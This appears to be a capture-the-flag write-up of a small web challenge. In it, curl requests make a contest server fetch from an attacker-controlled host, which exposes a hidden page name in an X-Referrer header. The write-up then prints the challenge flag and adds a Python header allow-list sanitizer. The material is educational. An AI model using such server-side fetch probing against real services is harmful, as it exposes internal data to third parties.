H4x0r, tired of his hacking attempts, is hosting a simple contest to rate the images of every user. Head on here to take part in the contest and impress him. http://backdoor.cognizance.org.in/problems/web100-1/submit.php
This challenge involved a pretty straightforward web service which leaked referrer information. Here's the landing page:
$ curl 'http://backdoor.cognizance.org.in/problems/web100-1/submit.php'
<html><head>
<title>Upload Image</title>
</head>
<body>
<h3>Give the link for your profile picture</h3>
<form action="./submit.php" method="POST">
<input name="url" placeholder="Enter link" type="url"><br>
<input value="Submit" type="submit">
</form>
</body></html>
Working through the problem, our first couple of POSTs show the application doesn't really care about images...
$ curl 'http://backdoor.cognizance.org.in/problems/web100-1/submit.php' --data 'url="'
The link is invalid. Click <a href='./submit.php'>here</a> to go back and try again.
$ curl 'http://backdoor.cognizance.org.in/problems/web100-1/submit.php' --data 'url=http://www.google.com'
Your profile picture has been given 28 points out of 100. Click <a href='./submit.php'>here</a> to go back and try again.
Next step: submit a URL for a host we control and view the actual request the service makes.
$ curl 'http://backdoor.cognizance.org.in/problems/web100-1/submit.php' --data 'url=http://ctf.shysecurity.com:8000'
Connection from 128.199.215.224 port 8000 [tcp/*] accepted
GET / HTTP/1.1
Host: ctf.shysecurity.com:8000
Accept: */*
X-Referrer: 92702a9381515494689f5d14f85a83b7.php
That X-Referrer is interesting... I wonder if we can GET it?
$ curl 'http://backdoor.cognizance.org.in/problems/web100-1/92702a9381515494689f5d14f85a83b7.php'
<html>
<head>
<title>Super Secret Page</title>
</head>
<body>
<h2>Super secret page</h2>
<p>This is a dangerous place. You shouldn't be lurking here. Click <a href="./submit.php">here</a> to go back.</p>
<!-- By the way, the flag is f556b9a48a3ee914f291f9b98645cb02 -->
</body>
Flag: f556b9a48a3ee914f291f9b98645cb02
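The leak here is the server-side fetcher attaching an internal page name to a request sent to a host the user chooses. As an added example (not part of the original write-up or the challenge's code), this Python code parses the captured request shown above, flags every header outside an allow-list, and strips it before the request would leave the server; the allow-list contents and the function names are assumptions.

```python
# Added example: audit and sanitize the headers a server-side URL fetcher
# sends to a user-supplied host. Not the challenge's own code.

# The request captured in the write-up above, as raw HTTP.
CAPTURED = (
    "GET / HTTP/1.1\r\n"
    "Host: ctf.shysecurity.com:8000\r\n"
    "Accept: */*\r\n"
    "X-Referrer: 92702a9381515494689f5d14f85a83b7.php\r\n"
    "\r\n"
)

# Assumption: the only headers an image fetcher needs to send.
ALLOWED = {"host", "accept", "user-agent"}


def parse_headers(raw):
    """Return [(name, value)] from a raw HTTP request, skipping the request line."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:  # ignore malformed lines that have no colon
            pairs.append((name.strip(), value.strip()))
    return pairs


def find_leaks(pairs, allowed=ALLOWED):
    """Headers outside the allow-list: each one is data handed to a third party."""
    return [(n, v) for n, v in pairs if n.lower() not in allowed]


def sanitize(pairs, allowed=ALLOWED):
    """Keep only allow-listed headers for the outbound request."""
    return [(n, v) for n, v in pairs if n.lower() in allowed]


if __name__ == "__main__":
    headers = parse_headers(CAPTURED)
    for name, value in find_leaks(headers):
        print(f"leaks to remote host: {name}: {value}")
    print("sent after sanitizing:", sanitize(headers))
```

Stripping the header only closes the leak; the page it names still needs real access control rather than an unguessable filename.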